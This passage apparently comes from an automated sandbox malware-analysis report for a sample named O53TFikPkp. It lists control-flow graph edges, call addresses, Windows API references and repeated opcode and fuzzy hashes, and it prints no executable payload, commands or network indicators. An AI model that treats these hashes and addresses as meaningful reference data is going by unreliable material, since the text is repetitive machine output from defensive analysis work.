4219->4237 4227 7120e3-7120ea 4220->4227 4228 711f7b-7120be 4220->4228 4223 7122c0-7122ee 4221->4223 4224 712304-712316 4221->4224 4222->4221 4254 7122f5-7122fd 4223->4254 4225->4213 4255 711c66-711c6d 4226->4255 4256 711e8b-711e9d 4226->4256 4227->4217 4231 7120f0-71220e 4227->4231 4228->4217 4231->4217 4244 711ef9-711f16 4237->4244 4258 711f21-711f31 4244->4258 4254->4224 4260 711c73-711d89 4255->4260 4261 711d8e-711db9 4255->4261 4256->4225 4256->4226 4343 711f37 call 8c09e0 4258->4343 4344 711f37 call 8c09f0 4258->4344 4345 711f37 call 8c0a80 4258->4345 4260->4256 4261->4256 4265 711dbf-711e62 4261->4265 4265->4256 4266 711f3d 4266->4217 4339->4135 4340->4135 4341->4107 4342->4107 4343->4266 4344->4266 4345->4266 4346->4113 4347->4113 4348->4113 4349->4113 4350->4116 4351->4116 4352->4116 4353->4116 4354->4119 4355->4119 4356->4123 4357->4123 4358->4132 4359->4132 4360->4132
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 2dde0aca6bda7bb740344480a14a384e575858739406443818321bf553f2cdcd
                                                                                            • Instruction ID: 06c3cecced72d2486ad204dbee4b550f27d823fda1472e561b3571f11b567f3b
                                                                                            • Opcode Fuzzy Hash: 2dde0aca6bda7bb740344480a14a384e575858739406443818321bf553f2cdcd
                                                                                            • Instruction Fuzzy Hash: 371219B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7340CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 4473 7111b2-7111ee 4478 7111f5-711212 4473->4478 4717 711212 call 46bf00 4478->4717 4718 711212 call 46bce8 4478->4718 4480 711218-71122a 4481 711231-711257 4480->4481 4483 71125d-71126f 4481->4483 4484 711276-711293 4483->4484 4722 711293 call 46d457 4484->4722 4723 711293 call 46da67 4484->4723 4724 711293 call 46da08 4484->4724 4725 711293 call 46dac8 4484->4725 4486 711299-7112ab 4487 7112b2-7112d8 4486->4487 4726 7112d8 call 46db87 4487->4726 4727 7112d8 call 46dac8 4487->4727 4728 7112d8 call 46db28 4487->4728 4729 7112d8 call 46dbe8 4487->4729 4489 7112de-7112f0 4490 7112f7-71131d 4489->4490 4730 71131d call 46dbe8 4490->4730 4731 71131d call 46dc48 4490->4731 4492 711323-71134b 4494 711352-711378 4492->4494 4732 711378 call 46e6f0 4494->4732 4733 711378 call 46ea60 4494->4733 4496 71137e-711390 4497 711397-7113bd 4496->4497 4499 7113c3-7113d5 4497->4499 4500 7113dc-711405 4499->4500 4502 71140b-71141d 4500->4502 4503 711424-711441 4502->4503 4712 711441 call 46f650 4503->4712 4713 711441 call 46f700 4503->4713 4714 711441 call 46f75f 4503->4714 4505 711447-711459 4506 711460-711489 4505->4506 4715 711489 call 46f820 4506->4715 4716 711489 call 46f8b0 4506->4716 4508 71148f-7114e9 4512 7114f0-71150d 4508->4512 4514 711513-71156d 4512->4514 4518 711574-711591 4514->4518 4520 711597-7115a9 4518->4520 4521 7115b0-7115d9 4520->4521 4523 7115df-7115f1 4521->4523 4524 7115f8-711621 4523->4524 4526 711627-711639 4524->4526 4527 711640-711669 4526->4527 4529 71166f-711681 4527->4529 4530 711688-7116b1 4529->4530 4532 7116b7-7116c9 4530->4532 4533 7116d0-7116f9 4532->4533 4535 7116ff-711711 4533->4535 4536 711718-711741 4535->4536 4538 711747-711759 4536->4538 4539 711760-711789 4538->4539 4541 71178f-7117a1 4539->4541 4542 7117a8-7117d1 4541->4542 4544 7117d7-7117e9 4542->4544 4545 7117f0-711819 4544->4545 4547 71181f-711831 4545->4547 4548 711838-711861 4547->4548 4550 711867-711879 4548->4550 4551 711880-71189d 4550->4551 4553 7118a3-7118fd 4551->4553 4557 711904-71192d 4553->4557 4559 711933-711945 4557->4559 4560 71194c-711975 4559->4560 4562 71197b-71198d 4560->4562 4563 711994-7119bd 4562->4563 4565 7119c3-7119d5 4563->4565 4566 7119dc-711a05 4565->4566 4568 711a0b-711a1d 4566->4568 4569 711a24-711a95 KiUserExceptionDispatcher 4568->4569 4573 711a9b-711aad 4569->4573 4574 711ab4-711add 4573->4574 4576 711ae3-711af5 4574->4576 4577 711afc-711b25 4576->4577 4579 711b2b-711b3d 4577->4579 4580 711b44-711b6d 4579->4580 4582 711b73-711bbf 4580->4582 4585 711bc5-711be8 4582->4585 4586 711ebb-711ecc 4582->4586 4598 711ea3-711eb8 4585->4598 4599 711bee-711c60 4585->4599 4589 711ed2-711ed9 4586->4589 4590 71222b-712232 4586->4590 4592 711edf-711ee5 4589->4592 4593 711f6e-711f75 4589->4593 4594 7122b4-7122be 4590->4594 4595 712238-7122a9 4590->4595 4610 711eed 4592->4610 4600 7120e3-7120ea 4593->4600 4601 711f7b-7120be 4593->4601 4596 7122c0-7122ee 4594->4596 4597 712304-712316 4594->4597 4595->4594 4627 7122f5-7122fd 4596->4627 4598->4586 4628 711c66-711c6d 4599->4628 4629 711e8b-711e9d 4599->4629 4600->4590 4604 7120f0-71220e 4600->4604 4601->4590 4604->4590 4617 711ef9-711f16 4610->4617 4631 711f21-711f31 4617->4631 4627->4597 4633 711c73-711d89 4628->4633 4634 711d8e-711db9 4628->4634 4629->4598 4629->4599 4719 711f37 call 8c09e0 4631->4719 4720 711f37 call 8c09f0 4631->4720 4721 711f37 call 8c0a80 4631->4721 4633->4629 4634->4629 4638 711dbf-711e62 4634->4638 4638->4629 4639 711f3d 4639->4590 4712->4505 4713->4505 4714->4505 4715->4508 4716->4508 4717->4480 4718->4480 4719->4639 4720->4639 4721->4639 4722->4486 4723->4486 4724->4486 4725->4486 4726->4489 4727->4489 4728->4489 4729->4489 4730->4492 4731->4492 4732->4496 4733->4496
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 4738d090b72965f366f13757008ea4a30d395682b0c293efe5c4c49f4581ea77
                                                                                            • Instruction ID: 8a705c381afb7b35523d79589768439b9b1ac51bf50802fef9d4ef6cc341499e
                                                                                            • Opcode Fuzzy Hash: 4738d090b72965f366f13757008ea4a30d395682b0c293efe5c4c49f4581ea77
                                                                                            • Instruction Fuzzy Hash: 101209B4A01229CFCB24DF24D95469CBBB6BF89306F5084E9D609A7340CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 4734 7111f7-711208 4736 71120d-711212 4734->4736 4970 711212 call 46bf00 4736->4970 4971 711212 call 46bce8 4736->4971 4738 711218-71122a 4739 711231-711257 4738->4739 4741 71125d-71126f 4739->4741 4742 711276-711293 4741->4742 4975 711293 call 46d457 4742->4975 4976 711293 call 46da67 4742->4976 4977 711293 call 46da08 4742->4977 4978 711293 call 46dac8 4742->4978 4744 711299-7112ab 4745 7112b2-7112d8 4744->4745 4979 7112d8 call 46db87 4745->4979 4980 7112d8 call 46dac8 4745->4980 4981 7112d8 call 46db28 4745->4981 4982 7112d8 call 46dbe8 4745->4982 4747 7112de-7112f0 4748 7112f7-71131d 4747->4748 4983 71131d call 46dbe8 4748->4983 4984 71131d call 46dc48 4748->4984 4750 711323-71134b 4752 711352-711378 4750->4752 4985 711378 call 46e6f0 4752->4985 4986 711378 call 46ea60 4752->4986 4754 71137e-711390 4755 711397-7113bd 4754->4755 4757 7113c3-7113d5 4755->4757 4758 7113dc-711405 4757->4758 4760 71140b-71141d 4758->4760 4761 711424-711441 4760->4761 4987 711441 call 46f650 4761->4987 4988 711441 call 46f700 4761->4988 4989 711441 call 46f75f 4761->4989 4763 711447-711459 4764 711460-711489 4763->4764 4990 711489 call 46f820 4764->4990 4991 711489 call 46f8b0 4764->4991 4766 71148f-7114e9 4770 7114f0-71150d 4766->4770 4772 711513-71156d 4770->4772 4776 711574-711591 4772->4776 4778 711597-7115a9 4776->4778 4779 7115b0-7115d9 4778->4779 4781 7115df-7115f1 4779->4781 4782 7115f8-711621 4781->4782 4784 711627-711639 4782->4784 4785 711640-711669 4784->4785 4787 71166f-711681 4785->4787 4788 711688-7116b1 4787->4788 4790 7116b7-7116c9 4788->4790 4791 7116d0-7116f9 4790->4791 4793 7116ff-711711 4791->4793 4794 711718-711741 4793->4794 4796 711747-711759 4794->4796 4797 711760-711789 4796->4797 4799 71178f-7117a1 4797->4799 4800 7117a8-7117d1 4799->4800 4802 7117d7-7117e9 4800->4802 4803 7117f0-711819 4802->4803 4805 71181f-711831 4803->4805 4806 711838-711861 4805->4806 4808 711867-711879 4806->4808 4809 711880-71189d 4808->4809 4811 7118a3-7118fd 4809->4811 4815 711904-71192d 4811->4815 4817 711933-711945 4815->4817 4818 71194c-711975 4817->4818 4820 71197b-71198d 4818->4820 4821 711994-7119bd 4820->4821 4823 7119c3-7119d5 4821->4823 4824 7119dc-711a05 4823->4824 4826 711a0b-711a1d 4824->4826 4827 711a24-711a95 KiUserExceptionDispatcher 4826->4827 4831 711a9b-711aad 4827->4831 4832 711ab4-711add 4831->4832 4834 711ae3-711af5 4832->4834 4835 711afc-711b25 4834->4835 4837 711b2b-711b3d 4835->4837 4838 711b44-711b6d 4837->4838 4840 711b73-711bbf 4838->4840 4843 711bc5-711be8 4840->4843 4844 711ebb-711ecc 4840->4844 4856 711ea3-711eb8 4843->4856 4857 711bee-711c60 4843->4857 4847 711ed2-711ed9 4844->4847 4848 71222b-712232 4844->4848 4850 711edf-711ee5 4847->4850 4851 711f6e-711f75 4847->4851 4852 7122b4-7122be 4848->4852 4853 712238-7122a9 4848->4853 4868 711eed 4850->4868 4858 7120e3-7120ea 4851->4858 4859 711f7b-7120be 4851->4859 4854 7122c0-7122ee 4852->4854 4855 712304-712316 4852->4855 4853->4852 4885 7122f5-7122fd 4854->4885 4856->4844 4886 711c66-711c6d 4857->4886 4887 711e8b-711e9d 4857->4887 4858->4848 4862 7120f0-71220e 4858->4862 4859->4848 4862->4848 4875 711ef9-711f16 4868->4875 4889 711f21-711f31 4875->4889 4885->4855 4891 711c73-711d89 4886->4891 4892 711d8e-711db9 4886->4892 4887->4856 4887->4857 4972 711f37 call 8c09e0 4889->4972 4973 711f37 call 8c09f0 4889->4973 4974 711f37 call 8c0a80 4889->4974 4891->4887 4892->4887 4896 711dbf-711e62 4892->4896 4896->4887 4897 711f3d 4897->4848 4970->4738 4971->4738 4972->4897 4973->4897 4974->4897 4975->4744 4976->4744 4977->4744 4978->4744 4979->4747 4980->4747 4981->4747 4982->4747 4983->4750 4984->4750 4985->4754 4986->4754 4987->4763 4988->4763 4989->4763 4990->4766 4991->4766
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 3b99a74f4ccd74298bbdd3b38146efad935ddb5178c91740a2d23a9ef72abd6a
                                                                                            • Instruction ID: 7d74a9c0f0df562d93f56b874060384a926957ec28728abde77ff2e4ec205639
                                                                                            • Opcode Fuzzy Hash: 3b99a74f4ccd74298bbdd3b38146efad935ddb5178c91740a2d23a9ef72abd6a
                                                                                            • Instruction Fuzzy Hash: 8A0218B4A01229CFCB24DF24D95469CBBB6BF88306F5084E9D609A7340CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 960a8e84e3d323c13c9b1732c36f0a41b7ce0d06d5ded1bca85ccd3233f95ad1
                                                                                            • Instruction ID: 83d24c4fb74c096924a03dc340efcc1ae1b3dace7a05629672e7284480eaaf92
                                                                                            • Opcode Fuzzy Hash: 960a8e84e3d323c13c9b1732c36f0a41b7ce0d06d5ded1bca85ccd3233f95ad1
                                                                                            • Instruction Fuzzy Hash: C60209B4A01229CFCB24DF24D95469CBBB6BF88306F5084E9D609A7341CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 580245862e510651e4b9c18586fba3cfad7def731d1e7454f01f31097f1fbc62
                                                                                            • Instruction ID: aeea0662698a51c2f25a198419ae0dbb722b0c70c714a8c6168c0f69a187602a
                                                                                            • Opcode Fuzzy Hash: 580245862e510651e4b9c18586fba3cfad7def731d1e7454f01f31097f1fbc62
                                                                                            • Instruction Fuzzy Hash: D80219B4A01229CFCB24DF24D95469CBBB6BF88306F5084E9D609A7341CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 58a4ff8dade7dfa1fa971fd1bc29386bb54ee6551c6420552f9d4487e02ab617
                                                                                            • Instruction ID: f966afcb3819b84534aae4fc5bf1c7d7c0261374128256880489feeffbab4309
                                                                                            • Opcode Fuzzy Hash: 58a4ff8dade7dfa1fa971fd1bc29386bb54ee6551c6420552f9d4487e02ab617
                                                                                            • Instruction Fuzzy Hash: 030219B4A01229CFCB24DF24D95469CBBB6BF88306F5084E9D609A7341CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 3ac8f168333d0a3ff48033add58da648c9a23a3a2c0e481103d5469b91ad5e1a
                                                                                            • Instruction ID: 91712e528a038008ab6521bbf5f0152ce1002f6942c68d9e270a9554463615d5
                                                                                            • Opcode Fuzzy Hash: 3ac8f168333d0a3ff48033add58da648c9a23a3a2c0e481103d5469b91ad5e1a
                                                                                            • Instruction Fuzzy Hash: 6EF119B4A01229CFCB24DF24D95469CBBB6BF88306F5084E9D609A7341CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: f3cdddd5a3718f1c9a9d9bcdfcd6cfecdaca81c5545d2833e39e0878dd371b8e
                                                                                            • Instruction ID: 66b9a257d82900da8adb349c20916e6f85477d1679278e45934834a4b7c0176f
                                                                                            • Opcode Fuzzy Hash: f3cdddd5a3718f1c9a9d9bcdfcd6cfecdaca81c5545d2833e39e0878dd371b8e
                                                                                            • Instruction Fuzzy Hash: E8F119B4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: e189c2c1beb32789d024de7d29538a1e5a245bf2327261057f715648c1a00183
                                                                                            • Instruction ID: 3ae9700c78267384737b991a5be184333ddd36a7dcd265e70029a254f1bbfa35
                                                                                            • Opcode Fuzzy Hash: e189c2c1beb32789d024de7d29538a1e5a245bf2327261057f715648c1a00183
                                                                                            • Instruction Fuzzy Hash: B2F10AB4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 9c521aedb30daef27d76e832c436811f17730a9cf29f07f8c0bfa7bc4614de57
                                                                                            • Instruction ID: 4f0a3973c9c39d63016b441a531a0342a38d63ade7b5ccd0d22652c0902883af
                                                                                            • Opcode Fuzzy Hash: 9c521aedb30daef27d76e832c436811f17730a9cf29f07f8c0bfa7bc4614de57
                                                                                            • Instruction Fuzzy Hash: 18F10AB4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: b715d3878baa2712174213b996f71f315912bc6f1daf8138e23e4df7af3c2fe7
                                                                                            • Instruction ID: 207b92346a06abb11612c545722c656c6b988ad28ef5d5b88e7e7e6f2f7e76e7
                                                                                            • Opcode Fuzzy Hash: b715d3878baa2712174213b996f71f315912bc6f1daf8138e23e4df7af3c2fe7
                                                                                            • Instruction Fuzzy Hash: 32E11AB4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 643f72bbcaaadaf9d739089a469437de2cfda979cbaeb3e1b35de0a21ae8b8f8
                                                                                            • Instruction ID: b74a8b784903b0fd3e670b10ea9e7c6569081c7f14c48ee117a7451bce0520ca
                                                                                            • Opcode Fuzzy Hash: 643f72bbcaaadaf9d739089a469437de2cfda979cbaeb3e1b35de0a21ae8b8f8
                                                                                            • Instruction Fuzzy Hash: 36E109B4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 7b140d8a0ad9237b69c30388b319944835f841116edd2ed21f66196a95c5525f
                                                                                            • Instruction ID: 96f1222076b0a2c43ec8807fb5c0d2172fa50e2b2365defb08640c06bb2378d2
                                                                                            • Opcode Fuzzy Hash: 7b140d8a0ad9237b69c30388b319944835f841116edd2ed21f66196a95c5525f
                                                                                            • Instruction Fuzzy Hash: BEE11AB4A01229CFCB24DF24C95469CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: f3096115a5e376fe6e818458822e2cbbbffaeb12139f9480fbb625fa443938c7
                                                                                            • Instruction ID: dbb47b19f49a3a2ba14e870d94d9cc9d62e892892cdde41661e05f2193546f22
                                                                                            • Opcode Fuzzy Hash: f3096115a5e376fe6e818458822e2cbbbffaeb12139f9480fbb625fa443938c7
                                                                                            • Instruction Fuzzy Hash: ABD119B4A01229CFCB24DB24C95479CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 8fba618e5d3b291c08592d6d810c2b587fe7080f453c561e2a149183b8659671
                                                                                            • Instruction ID: e2d2cf7bda8b7481edf30eeb47a25fb30b5311cf69e6611cad98587a1e7ab9cc
                                                                                            • Opcode Fuzzy Hash: 8fba618e5d3b291c08592d6d810c2b587fe7080f453c561e2a149183b8659671
                                                                                            • Instruction Fuzzy Hash: 15D11AB4A01228CFCB24DB24C95479DBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 650160f99e9c6c51782076edcf2465f2b3c3021b8a745bad737a52f762df0a01
                                                                                            • Instruction ID: 3534def4daefa16e75f981d481915a77cdc58aa5fc53e1e2eec90e720510c25c
                                                                                            • Opcode Fuzzy Hash: 650160f99e9c6c51782076edcf2465f2b3c3021b8a745bad737a52f762df0a01
                                                                                            • Instruction Fuzzy Hash: 3BD11AB4A01228CFCB24DB24C95479CBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: be070f21e870c862eb71ab56a36f35aca76099b1fe808f6619e531fa86be6c19
                                                                                            • Instruction ID: 2f28cf53ea381f8a449cdf64d523d9fb1d053a4fd0257014a286fc5deaa4bbd0
                                                                                            • Opcode Fuzzy Hash: be070f21e870c862eb71ab56a36f35aca76099b1fe808f6619e531fa86be6c19
                                                                                            • Instruction Fuzzy Hash: 2BD11AB4A01228CFCB24DB24C95479DBBB6BF84306F5084E9D609A7741CF399E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d575f1931b43fc691d46e96e19a329efc9b57447d0287893e30ab7aea4a4778a
                                                                                            • Instruction ID: d29c82d7917f18974eb704a22c034975d96280707419ba335b54c4e1fdb80df1
                                                                                            • Opcode Fuzzy Hash: d575f1931b43fc691d46e96e19a329efc9b57447d0287893e30ab7aea4a4778a
                                                                                            • Instruction Fuzzy Hash: 86A1D631B083849FCB01DBB4D854AAE7BB1EF85304F1584ABD545DB396EB349C098BA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 4431690f1a05a51f7bb8b83170b18220c357cc10d05a8dbb8d1d66c2767d2136
                                                                                            • Instruction ID: 050e345d20dca3785a3e9361709a99e7c50f124497aaaea05932d513f249720a
                                                                                            • Opcode Fuzzy Hash: 4431690f1a05a51f7bb8b83170b18220c357cc10d05a8dbb8d1d66c2767d2136
                                                                                            • Instruction Fuzzy Hash: 08C11AB4A01228CFCB24DB24C95479DBBB6BF88306F5084E9D609A7741CF359E86CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
